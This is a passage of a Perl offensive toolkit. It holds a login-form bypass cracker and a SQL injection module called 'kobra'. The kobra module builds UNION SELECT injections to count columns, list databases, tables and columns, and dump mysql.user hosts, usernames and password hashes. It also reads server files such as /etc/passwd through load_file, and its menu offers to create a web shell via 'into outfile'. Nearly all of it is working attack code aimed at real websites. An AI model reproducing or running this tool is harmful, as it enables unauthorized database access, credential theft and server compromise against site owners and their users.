- }
- else {
- printear(
- "[+] Name : " . $test->attr(name) . "\n", "text",
- "13", "5"
- );
- }
- printear( "[+] Action : " . $test->action . "\n",
- "text", "13", "5" );
- printear( "[+] Method : " . $test->method . "\n",
- "text", "13", "5" );
- printear( "\n-- == Input == --\n", "text", "5", "5" );
- @inputs = $test->inputs;
- foreach $in (@inputs) {
- printear( "\n[+] Type : " . $in->type . "\n",
- "text", "13", "5" );
- printear( "[+] Name : " . $in->name . "\n", "text", "13", "5" );
- printear( "[+] Value : " . $in->value . "\n",
- "text", "13", "5" );
- }
- }
- my $op = printear( "\n[+] Form to crack : ", "stdin", "11", "13" );
- my $aca = printear( "\n[+] Submit Name : ", "stdin", "11", "13" );
- printear( "\n[+] Options to check\n\n", "text", "5", "5" );
- printear( "[?] 1 - Positive\n", "text", "13", "5" );
- printear( "[?] 2 - Negative\n", "text", "13", "5" );
- printear( "[?] 3 - Automatic\n\n", "text", "13", "5" );
- my $op2 = printear( "[+] Option : ", "stdin", "11", "13" );
- if ( $op2 eq "1" ) {
- my $st = printear( "\n[+] String : ", "stdin", "11", "13" );
- printear( "\n[+] Cracking login....\n", "text", "13", "5" );
- for my $by (@bypass) {
- chomp $by;
- my $code = load_nownow( $url, $code, $op, $aca, $by );
- if ( $code =~ /$st/ig ) {
- cracked( $url, $by );
- }
- }
- adios();
- }
- if ( $op2 eq "2" ) {
- my $st = printear( "\n[+] String : ", "stdin", "11", "13" );
- printear( "\n[+] Cracking login....\n", "text", "13", "5" );
- for my $by (@bypass) {
- chomp $by;
- my $code = load_nownow( $url, $code, $op, $aca, $by );
- unless ( $code =~ /$st/ig ) {
- cracked( $url, $by );
- }
- }
- adios();
- }
- if ( $op2 eq "3" ) {
- printear( "\n[+] Cracking login....\n", "text", "13", "5" );
- my $prueba_falsa =
- load_nownow( $url, $code, $op, $aca, "fuck you" );
- for my $by (@bypass) {
- chomp $by;
- my $code = load_nownow( $url, $code, $op, $aca, $by );
- unless ( $code eq $prueba_falsa ) {
- cracked( $url, $by );
- }
- }
- adios();
- }
- }
- sub load_nownow {
- my ( $url, $code, $op, $aca, $text ) = @_;
- $op--;
- my @probar = ( HTML::Form->parse( $code, "/" ) )[$op];
- for my $testa (@probar) {
- if ( $testa->method eq "POST" ) {
- my @inputs = $testa->inputs;
- for my $in (@inputs) {
- if ( $in->type eq "submit" ) {
- if ( $in->name eq $aca ) {
- push( @botones_names, $in->name );
- push( @botones_values, $in->value );
- }
- }
- else {
- push( @ordenuno, $in->name, $text );
- }
- }
- my @preuno = @ordenuno;
- push( @preuno, $botones_names[0], $botones_values[0] );
- my $codeuno = $nave->post( $url, \@preuno )->content;
- return $codeuno;
- }
- else {
- my $final = "";
- my $orden = "";
- my $partedos = "";
- my @inputs = $testa->inputs;
- for my $testa (@inputs) {
- if ( $testa->name eq $aca ) {
- push( @botones_names, $testa->name );
- push( @botones_values, $testa->value );
- }
- else {
- $orden .= '' . $testa->name . '=' . $text . '&';
- }
- }
- chop($orden);
- my $partedos =
- "&" . $botones_names[0] . "=" . $botones_values[0];
- my $final = $url . "?" . $orden . $partedos;
- $codedos = toma($final);
- return $codedos;
- }
- }
- }
- sub cracked {
- printear( "\n\a\a[+] Login Cracked\n\n", "text", "7", "5" );
- printear( "[+] URL : $_[0]\n", "text", "7", "5" );
- printear( "[+] Bypass : $_[1]\n", "text", "7", "5" );
- savefile( "logs-bypass.txt", "[+] URL : $_[0]" );
- savefile( "logs-bypass.txt", "[+] Bypass : $_[1]\n" );
- adios();
- }
- sub head_bypass {
- clean();
- printear( "
- @@@@ @@@@@ @ @ @
- @ @ @ @ @ @
- @ @ @ @ @ @ @
- @ @ @ @ @ @ @@@ @@ @@ @ @ @@@@ @@@ @@ @ @ @@
- @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @
- @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @
- @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @@@@ @ @ @@@@ @@ @@ @ @ @@@@ @ @ @ @ @ @
- @
- @@
- ", "logos", "7", "5" );
- }
- } ##
- sub load_kobra {
- installer_kobra();
- clean();
- &head_kobra;
- &menu_kobra;
- adios();
- sub menu_kobra {
- my $page = printear( "[Page] : ", "stdin", "11", "13" );
- my $bypass =
- printear( "\n[Bypass : -- /* %20] : ", "stdin", "11", "13" );
- print "\n";
- if ( $page eq "exit" ) {
- adios();
- }
- &scan_kobra( $page, $bypass );
- }
- sub scan_kobra {
- my $page = $_[0];
- printear( "[Status] : Scanning.....\n", "text", "13", "5" );
- ( $pass1, $bypass2 ) = &bypass( $_[1] );
- my $save = partimealmedio( $_[0] );
- if ( $_[0] =~ /hackman/ig ) {
- savefilear( $save . ".txt", "\n[Target Confirmed] : $_[0]\n" );
- &menu_options( $_[0], $_[1], $save );
- }
- my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
- my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
- unless ( $testar1 eq $testar2 ) {
- motor( $page, $_[1] );
- }
- else {
- printear( "\n[-] Not vulnerable\n\n", "text", "5", "5" );
- my $op = printear( "[+] Scan anyway y/n : ", "stdin", "11", "13" );
- if ( $op eq "y" ) {
- motor( $page, $_[1] );
- }
- else {
- head_kobra();
- menu_kobra();
- }
- }
- }
- sub motor {
- my ( $gen, $save, $control ) = &length( $_[0], $_[1] );
- if ( $control eq 1 ) {
- printear( "[Status] : Enjoy the menu\n\n", "text", "13", "5" );
- &menu_options( $gen, $_[1], $save );
- }
- else {
- printear( "[Status] : Length columns not found\n\n",
- "text", "5", "5" );
- <STDIN>;
- &head_kobra;
- &menu_kobra;
- }
- }
- sub head_kobra {
- clean();
- printear( "
- @ @@ @
- @@ @ @ @@
- @ @@ @ @ @ @ @ @ @@@
- @ @ @ @ @@ @ @@@ @ @
- @@ @ @ @ @ @ @@@
- @ @ @ @ @ @ @ @ @
- @@@ @ @@ @@@ @@@ @@@@@
- ", "logos", "7", "5" );
- }
- sub length {
- printear(
- "\n[+] Looking for the number of columns\n\n", "text",
- "13", "5"
- );
- my $rows = "0";
- my $asc;
- my $page = $_[0];
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
- $total = "1";
- for my $rows ( 2 .. 200 ) {
- $asc .= "," . "char("
- . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
- $total .= "," . $rows;
- $injection =
- $page . "1"
- . $pass1 . "and"
- . $pass1 . "1=0"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1
- . $alert
- . $asc;
- $test = toma($injection);
- if ( $test =~ /RATSXPDOWN/ ) {
- @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
- $control = 1;
- my $save = partimealmedio( $_[0] );
- savefilear( $save . ".txt", "\n[Target confirmed] : $page" );
- savefilear( $save . ".txt", "[Bypass] : $_[1]\n" );
- savefilear( $save . ".txt",
- "[Limit] : The site has $rows columns" );
- savefilear( $save . ".txt",
- "[Data] : The number @number print data" );
- $total =~ s/$number[0]/hackman/;
- savefilear(
- $save . ".txt",
- "[SQLI] : "
- . $page . "1"
- . $pass1 . "and"
- . $pass1 . "1=0"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1
- . $total
- );
- return (
- $page . "1"
- . $pass1 . "and"
- . $pass1 . "1=0"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1
- . $total,
- $save, $control
- );
- }
- }
- }
- sub details {
- my ( $page, $bypass, $save ) = @_;
- ( $pass1, $pass2 ) = &bypass($bypass);
- savefilear( $save . ".txt", "\n" );
- if ( $page =~ /(.*)hackman(.*)/ig ) {
- printear( "[+] Searching information..\n\n", "text", "13", "5" );
- my ( $start, $end ) = ( $1, $2 );
- $inforschema =
- $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
- . $end
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass2;
- $mysqluser =
- $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
- . $end
- . $pass1 . "from"
- . $pass1
- . "mysql.user"
- . $pass2;
- $test3 =
- toma( $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
- . $end
- . $pass2 );
- $test1 = toma($inforschema);
- $test2 = toma($mysqluser);
- if ( $test2 =~ /ERTOR854/ig ) {
- savefilear( $save . ".txt", "[mysql.user] : ON" );
- printear( "[mysql.user] : ON\n", "text", "7", "5" );
- }
- else {
- printear( "[mysql.user] : OFF\n", "text", "5", "5" );
- savefilear( $save . ".txt", "[mysql.user] : OFF" );
- }
- if ( $test1 =~ /ERTOR854/ig ) {
- printear( "[information_schema.tables] : ON\n",
- "text", "7", "5" );
- savefilear( $save . ".txt",
- "[information_schema.tables] : ON" );
- }
- else {
- printear( "[information_schema.tables] : OFF\n",
- "text", "5", "5" );
- savefilear( $save . ".txt",
- "[information_schema.tables] : OFF" );
- }
- if ( $test3 =~ /ERTOR854/ig ) {
- printear( "[load_file] : ON\n", "text", "7", "5" );
- savefilear(
- $save . ".txt",
- "[load_file] : "
- . $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
- . $end
- . $pass2
- );
- }
- $concat =
- "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
- $injection = $start . $concat . $end . $pass2;
- $code = toma($injection);
- if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
- printear(
- "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] Username : $3\n\n",
- "text", "7", "5"
- );
- savefilear(
- $save . ".txt",
- "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] Username : $3\n"
- );
- }
- else {
- printear( "\n[-] Not found any data\n", "text", "5", "5" );
- }
- }
- }
- sub menu_options {
- my $testarnownow = $_[0]; ## Comment on this line to compile to exe
- $SIG{INT} =
- sub { reload($testarnownow) }; ## Comment on this line to compile to exe
- head_kobra();
- printear( "[Target confirmed] : $_[0]\n", "text", "11", "5" );
- printear( "[Bypass] : $_[1]\n\n", "text", "11", "5" );
- my $save = partimealmedio( $_[0] );
- printear( "[save] : /logs/webs/$save\n\n", "text", "11", "5" );
- printear( "\n--== information_schema.tables ==--\n\n",
- "logos", "5", "5" );
- printear( "[1] : Show tables\n", "logos", "13", "5" );
- printear( "[2] : Show columns\n", "logos", "13", "5" );
- printear( "[3] : Show DBS\n", "logos", "13", "5" );
- printear( "[4] : Show tables with other DB\n", "logos", "13", "5" );
- printear( "[5] : Show columns with other DB", "logos", "13", "5" );
- printear( "\n\n--== mysql.user ==--\n\n", "logos", "5", "5" );
- printear( "[6] : Show users\n", "logos", "13", "5" );
- printear( "\n--== Others ==--\n\n", "logos", "5", "5" );
- printear( "[7] : Fuzz tables\n", "logos", "13", "5" );
- printear( "[8] : Fuzz Columns\n", "logos", "13", "5" );
- printear( "[9] : Fuzzing files with load_file\n", "logos", "13", "5" );
- printear( "[10] : Read a file with load_file\n", "logos", "13", "5" );
- printear( "[11] : Dump\n", "logos", "13", "5" );
- printear( "[12] : Informacion of the server\n", "logos", "13", "5" );
- printear( "[13] : Create a shell with into outfile\n",
- "logos", "13", "5" );
- printear( "[14] : Show Log\n", "logos", "13", "5" );
- printear( "[15] : Change Target\n", "logos", "13", "5" );
- printear( "[16] : Exit\n", "logos", "13", "5" );
- my $opcion = printear( "\n[Option] : ", "stdin", "11", "13" );
- if ( $opcion eq "1" ) {
- schematables( $_[0], $_[1], $save );
- &reload;
- }
- elsif ( $opcion eq "2" ) {
- my $tabla = printear( "\n[Table] : ", "stdin", "11", "13" );
- schemacolumns( $_[0], $_[1], $save, $tabla );
- &reload;
- }
- elsif ( $opcion eq "3" ) {
- &schemadb( $_[0], $_[1], $save );
- &reload;
- }
- elsif ( $opcion eq "4" ) {
- my $data = printear( "\n[Database] : ", "stdin", "11", "13" );
- &schematablesdb( $_[0], $_[1], $data, $save );
- &reload;
- }
- elsif ( $opcion eq "5" ) {
- my $db = printear( "\n[DB] : ", "stdin", "11", "13" );
- my $table = printear( "\n[Table] : ", "stdin", "11", "13" );
- &schemacolumnsdb( $_[0], $_[1], $db, $table, $save );
- &reload;
- }
- elsif ( $opcion eq "6" ) {
- &mysqluser( $_[0], $_[1], $save );
- &reload;
- }
- elsif ( $opcion eq "7" ) { ##
- &fuzz( $_[0], $_[1], $save );
- &reload;
- }
- elsif ( $opcion eq "8" ) { ##
- my $table = printear( "\n[Table] : ", "stdin", "11", "13" );
- &fuzzcol( $_[0], $_[1], $table, $save );
- &reload;
- }
- elsif ( $opcion eq "9" ) {
- &load( $_[0], $_[1], $save );
- &reload;
- }
- elsif ( $opcion eq "10" ) {
- &loadfile( $_[0], $_[1], $save );
- &reload;
- }
- elsif ( $opcion eq "11" ) {
- my $tabla = printear( "\n[Table to dump] : ", "stdin", "11", "13" );
- my $col1 = printear( "\n[Column 1] : ", "stdin", "11", "13" );
- my $col2 = printear( "\n[Column 2] : ", "stdin", "11", "13" );
- print "\n\n";
- &dump( $_[0], $col1, $col2, $tabla, $_[1], $save );
- &reload;
- }
- elsif ( $opcion eq "12" ) {
- print "\n";
- &details( $_[0], $_[1], $save );
- &reload;
- }
- elsif ( $opcion eq "13" ) {
- my $path =
- printear( "\n[Full Path Discloure] : ", "stdin", "11", "13" );
- &into( $_[0], $_[1], $path, $save );
- &reload;
- }
- elsif ( $opcion eq "14" ) {
- $t = "logs/webs/$save.txt";
- system_leida($t);
- &reload;
- }
- elsif ( $opcion eq "15" ) {
- &head_kobra;
- &menu_kobra;
- }
- elsif ( $opcion eq "16" ) {
- adios();
- }
- else {
- &reload;
- }
- }
- sub schematables {
- $real = "1";
- my ( $page, $bypass, $save ) = @_;
- savefilear( $save . ".txt", "\n" );
- my $page1 = $page;
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- savefilear( $save . ".txt", "[DB] : Default" );
- printear( "\n[+] Searching tables with schema\n\n", "text", "13", "5" );
- $page =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $page1 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code =
- toma( $page1
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass2 );
- if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $resto = $1;
- $total = $resto - 17;
- printear( "[+] Tables Length : $total\n\n", "text", "13", "5" );
- savefilear( $save . ".txt", "[+] Searching tables with schema\n" );
- savefilear( $save . ".txt", "[+] Tables Length : $total\n" );
- my $limit = $1;
- for my $limit ( 17 .. $limit ) {
- $code1 =
- toma( $page
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass1 . "limit"
- . $pass1
- . $limit . ",1"
- . $pass2 );
- #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2."\n";
- if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $table = $1;
- chomp $table;
- printear( "[Table $real Found : $table ]\n",
- "text", "7", "5" );
- savefilear( $save . ".txt",
- "[Table $real Found : $table ]" );
- $real++;
- }
- }
- }
- else {
- printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
- }
- }
- sub reload {
- printear( "\n[+] Press the enter key to return to main menu\n",
- "text", "11", "5" );
- <STDIN>;
- &head_kobra;
- &menu_options;
- }
- sub schemacolumns {
- my ( $page, $bypass, $save, $table ) = @_;
- my $page3 = $page;
- my $page4 = $page;
- savefilear( $save . ".txt", "\n" );
- ( $pass1, $pass2 ) = &bypass($bypass);
- printear( "\n[DB] : Default\n", "text", "13", "5" );
- savefilear( $save . ".txt", "[DB] : Default" );
- savefilear( $save . ".txt", "[Table] : $table\n" );
- $page3 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code3 =
- toma( $page3
- . $pass1 . "from"
- . $pass1
- . "information_schema.columns"
- . $pass1 . "where"
- . $pass1
- . "table_name=char("
- . ascii($table) . ")"
- . $pass2 );
- if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- printear( "\n[Columns Length : $1 ]\n\n", "text", "13", "5" );
- savefilear( $save . ".txt", "[Columns Length : $1 ]\n" );
- my $si = $1;
- chomp $si;
- $page4 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $real = "1";
- for my $limit2 ( 0 .. $si ) {
- $code4 =
- toma( $page4
- . $pass1 . "from"
- . $pass1
- . "information_schema.columns"
- . $pass1 . "where"
- . $pass1
- . "table_name=char("
- . ascii($table) . ")"
- . $pass1 . "limit"
- . $pass1
- . $limit2 . ",1"
- . $pass2 );
- if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- printear( "[Column $real] : $1\n", "text", "7", "5" );
- savefilear( $save . ".txt", "[Column $real] : $1" );
- $real++;
- }
- }
- }
- else {
- printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
- }
- }
- sub schemadb {
- my ( $page, $bypass, $save ) = @_;
- my $page1 = $page;
- savefilear( $save . ".txt", "\n" );
- printear( "\n[+] Searching DBS\n\n", "text", "13", "5" );
- ( $pass1, $pass2 ) = &bypass($bypass);
- $page =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code = toma(
- $page . $pass1 . "from" . $pass1 . "information_schema.schemata" );
- if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $limita = $1;
- printear( "[+] Databases Length : $limita\n\n", "text", "13", "5" );
- savefilear( $save . ".txt", "[+] Databases Length : $limita\n" );
- $page1 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $real = "1";
- for my $limit ( 0 .. $limita ) {
- $code =
- toma( $page1
- . $pass1 . "from"
- . $pass1
- . "information_schema.schemata"
- . $pass1 . "limit"
- . $pass1
- . $limit . ",1"
- . $pass2 );
- if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $control = $1;
- if ( $control ne "information_schema"
- and $control ne "mysql"
- and $control ne "phpmyadmin" )
- {
- printear(
- "[Database $real Found] $control\n", "text",
- "7", "5"
- );
- savefilear( $save . ".txt",
- "[Database $real Found] : $control" );
- $real++;
- }
- }
- }
- }
- else {
- printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
- }
- }
- sub schematablesdb {
- my $page = $_[0];
- my $db = $_[2];
- my $page1 = $page;
- savefilear( $_[3] . ".txt", "\n" );
- printear( "\n[+] Searching tables in DB [$db]\n\n", "text", "13", "5" );
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- savefilear( $_[3] . ".txt", "[DB] : $db" );
- $page =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $page1 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code =
- toma( $page1
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass1 . "where"
- . $pass1
- . "table_schema=char("
- . ascii($db) . ")"
- . $pass2 );
- #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
- if ( $code =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- printear( "[+] Tables Length : $1\n\n", "text", "13", "5" );
- savefilear( $_[3] . ".txt", "[+] Tables Length : $1\n" );
- my $limit = $1;
- $real = "1";
- for my $lim ( 0 .. $limit ) {
- $code1 =
- toma( $page
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass1 . "where"
- . $pass1
- . "table_schema=char("
- . ascii($db) . ")"
- . $pass1 . "limit"
- . $pass1
- . $lim . ",1"
- . $pass2 );
- #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
- if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- my $table = $1;
- chomp $table;
- savefilear( $_[3] . ".txt",
- "[Table $real Found : $table ]" );
- printear( "[Table $real Found : $table ]\n",
- "text", "7", "5" );
- $real++;
- }
- }
- }
- else {
- printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
- }
- }
- sub schemacolumnsdb {
- my ( $page, $bypass, $db, $table, $save ) = @_;
- my $page3 = $page;
- my $page4 = $page;
- printear( "\n[+] Searching columns in table $table in DB [$db]\n",
- "text", "13", "5" );
- savefilear( $save . ".txt", "\n" );
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- savefilear( $save . ".txt", "\n[DB] : $db" );
- savefilear( $save . ".txt", "[Table] : $table" );
- $page3 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code3 =
- toma( $page3
- . $pass1 . "from"
- . $pass1
- . "information_schema.columns"
- . $pass1 . "where"
- . $pass1
- . "table_name=char("
- . ascii($table) . ")"
- . $pass1 . "and"
- . $pass1
- . "table_schema=char("
- . ascii($db) . ")"
- . $pass2 );
- if ( $code3 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- printear( "\n[Columns length : $1 ]\n\n", "text", "13", "5" );
- savefilear( $save . ".txt", "[Columns length : $1 ]\n" );
- my $si = $1;
- chomp $si;
- $page4 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $real = "1";
- for my $limit2 ( 0 .. $si ) {
- $code4 =
- toma( $page4
- . $pass1 . "from"
- . $pass1
- . "information_schema.columns"
- . $pass1 . "where"
- . $pass1
- . "table_name=char("
- . ascii($table) . ")"
- . $pass1 . "and"
- . $pass1
- . "table_schema=char("
- . ascii($db) . ")"
- . $pass1 . "limit"
- . $pass1
- . $limit2 . ",1"
- . $pass2 );
- if ( $code4 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- printear( "[Column $real] : $1\n", "text", "7", "5" );
- savefilear( $save . ".txt", "[Column $real] : $1" );
- $real++;
- }
- }
- }
- else {
- printear( "\n[-] information_schema = ERROR\n", "text", "5", "5" );
- }
- }
- sub mysqluser {
- my ( $page, $bypass, $save ) = @_;
- my $cop = $page;
- my $cop1 = $page;
- savefilear( $save . ".txt", "\n" );
- printear( "\n[+] Finding mysql.users\n", "text", "13", "5" );
- ( $pass1, $pass2 ) = &bypass($bypass);
- $page =~ s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
- $code =
- toma( $page . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
- if ( $code =~ /RATSXPDOWN/ig ) {
- $cop1 =~
- s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
- $code1 =
- toma( $cop1 . $pass1 . "from" . $pass1 . "mysql.user" . $pass2 );
- if ( $code1 =~ /RATSXPDOWN1(.*)RATSXPDOWN1/ig ) {
- printear( "\n[+] Users Found : $1\n\n", "text", "13", "5" );
- savefilear( $save . ".txt", "\n[+] Users mysql Found : $1\n" );
- for my $limit ( 0 .. $1 ) {
- $cop =~
- s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
- $code =
- toma( $cop
- . $pass1 . "from"
- . $pass1
- . "mysql.user"
- . $pass1 . "limit"
- . $pass1
- . $limit . ",1"
- . $pass2 );
- if ( $code =~
- /RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig
- )
- {
- printear( "[Host] : $1 [User] : $2 [Password] : $3\n",
- "text", "7", "5" );
- savefilear( $save . ".txt",
- "[Host] : $1 [User] : $2 [Password] : $3" );
- }
- else {
- &reload;
- }
- }
- }
- }
- else {
- printear( "\n[-] mysql.user = ERROR\n", "text", "5", "5" );
- }
- }
- sub fuzz {
- my $page = $_[0];
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- my $count = "0";
- savefilear( $_[2] . ".txt", "\n" );
- print "\n";
- if ( $_[0] =~ /(.*)hackman(.*)/g ) {
- my $start = $1;
- my $end = $2;
- printear( "[+] Searching tables.....\n\n", "text", "13", "5" );
- for my $table (@buscar2) {
- chomp $table;
- $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
- $injection =
- $start
- . $concat
- . $end
- . $pass1 . "from"
- . $pass1
- . $table
- . $pass2;
- $code = toma($injection);
- if ( $code =~ /ERTOR854/g ) {
- $count++;
- printear( "[Table Found] : $table\n", "text", "7", "5" );
- savefilear( $_[2] . ".txt", "[Table Found] : $table" );
- }
- }
- }
- if ( $count eq "0" ) {
- printear( "[-] Not found any table\n", "text", "5", "5" );
- &reload;
- }
- }
- sub fuzzcol {
- my $page = $_[0];
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- my $count = "0";
- savefilear( $_[3] . ".txt", "\n" );
- print "\n";
- if ( $_[0] =~ /(.*)hackman(.*)/ ) {
- my $start = $1;
- my $end = $2;
- printear(
- "[+] Searching columns for the table ["
- . $_[2] . "]"
- . " ....\n\n",
- "text", "13", "5"
- );
- savefilear( $_[3] . ".txt", "[Table] : $_[2]" );
- for my $columns (@buscar1) {
- chomp $columns;
- $concat =
- "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
- $code =
- toma( $start
- . $concat
- . $end
- . $pass1 . "from"
- . $pass1
- . $_[2]
- . $pass2 );
- if ( $code =~ /ERTOR854/g ) {
- $count++;
- printear( "[Column Found] : $columns\n", "text", "7", "5" );
- savefilear( $_[3] . ".txt", "[Column Found] : $columns" );
- }
- }
- }
- if ( $count eq "0" ) {
- printear( "[-] Not found any column\n", "text", "5", "5" );
- &reload;
- }
- }
- sub load {
- savefilear( $_[2] . ".txt", "\n" );
- print "\n";
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- if ( $_[0] =~ /(.*)hackman(.*)/g ) {
- printear(
- "[+] Searching files with load_file...\n\n", "text",
- "13", "5"
- );
- my $start = $1;
- my $end = $2;
- for my $file (@files) {
- chomp $file;
- $concat =
- "unhex(hex(concat(char(107,48,98,114,97),load_file("
- . encode($file)
- . "),char(107,48,98,114,97))))";
- my $code = toma( $start . $concat . $end . $pass2 );
- chomp $code;
- if ( $code =~ /k0bra(.*)k0bra/s ) {
- printear( "[File Found] : $file\n", "text", "11", "5" );
- printear( "\n[Source Start]\n\n", "text", "7", "5" );
- printear( "$1", "text", "7", "5" );
- printear( "\n\n[Source End]\n\n", "text", "7", "5" );
- savefilear( $_[2] . ".txt", "[File Found] : $file" );
- savefilear( $_[2] . ".txt", "\n[Source Start]\n" );
- savefilear( $_[2] . ".txt", "$1" );
- savefilear( $_[2] . ".txt", "\n[Source End]\n" );
- }
- }
- }
- }
- sub loadfile {
- savefilear( $_[2] . ".txt", "\n" );
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- if ( $_[0] =~ /(.*)hackman(.*)/g ) {
- my $start = $1;
- my $end = $2;
- my $file = printear( "\n[+] File to read : ", "stdin", "11", "13" );
- $concat =
- "unhex(hex(concat(char(107,48,98,114,97),load_file("
- . encode($file)
- . "),char(107,48,98,114,97))))";
- my $code = toma( $start . $concat . $end . $pass2 );
- chomp $code;
- if ( $code =~ /k0bra(.*)k0bra/s ) {
- printear( "\n[File Found] : $file\n", "text", "11", "5" );
- printear( "\n[Source Start]\n\n", "text", "7", "5" );
- printear( "$1", "text", "7", "5" );
- printear( "\n\n[Source End]\n\n", "text", "7", "5" );
- savefilear( $_[2] . ".txt", "[File Found] : $file" );
- savefilear( $_[2] . ".txt", "\n[Source Start]\n" );
- savefilear( $_[2] . ".txt", "$1" );
- savefilear( $_[2] . ".txt", "\n[Source End]\n" );
- }
- }
- }
- sub dump {
- savefilear( $_[5] . ".txt", "\n" );
- my $page = $_[0];
- ( $pass1, $pass2 ) = &bypass( $_[4] );
- if ( $page =~ /(.*)hackman(.*)/ ) {
- my $start = $1;
- my $end = $2;
- printear( "[+] Extracting values...\n", "text", "13", "5" );
- $concatx =
- "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
- $val_code =
- toma( $start
- . $concatx
- . $end
- . $pass1 . "from"
- . $pass1
- . $_[3]
- . $pass2 );
- $concat =
- "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
- if ( $val_code =~ /ERTOR854(.*)ERTOR854/ig ) {
- $tota = $1;
- printear(
